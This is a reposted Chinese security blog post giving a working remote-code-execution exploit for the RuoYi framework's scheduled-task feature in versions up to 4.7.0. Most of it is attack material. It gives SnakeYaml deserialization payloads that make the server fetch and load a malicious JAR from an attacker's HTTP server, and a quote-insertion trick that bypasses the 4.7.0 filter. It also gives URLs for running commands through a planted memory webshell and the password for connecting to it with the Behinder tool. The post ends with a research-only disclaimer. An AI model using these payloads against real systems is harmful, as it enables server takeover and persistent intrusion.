文章总结： 本文介绍了RuoYi框架4.6.2及4.7.0版本后台定时任务存在的RCE漏洞。利用SnakeYaml反序列化，通过ScriptEngineManager加载远程恶意JAR包执行命令。对于4.7.0版本需在URL中插入单引号绕过检测。攻击者可建立内存马连接冰蝎。建议升级框架版本或限制SnakeYaml的使用。 综合评分： 85 文章分类： 漏洞分析,漏洞POC,WEB安全,渗透测试

Ruoyi单应用版本漏洞合集2

原创

安全艺术

安全艺术

2026年1月12日 12:00 北京

1. RuoYi 4.6.2-4.7.0后台定时任务RCE（snakeyaml）

1.1. RuoYi<=4.6.2

py2

python -m SimpleHTTPServer 8888

py3

python -m http.server 8888

系统监控-定时任务

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.168.3.102:8888/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"]]]]')

命令执行：

http://192.168.3.102/login?cmd=whoami

连接冰蝎：/login?cmd=1（cmd不为空即可），密码为rebeyond，使用冰蝎正常连接即可

http://192.168.3.102/login?cmd=1

密码：rebeyond

卸载内存马：

http://192.168.3.102/login?cmd=delete

1.2. RuoYi-4.7.0

绕过

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["h't't'p://192.168.3.102:8888/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"]]]]')

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术《Ruoyi单应用版本漏洞合集2》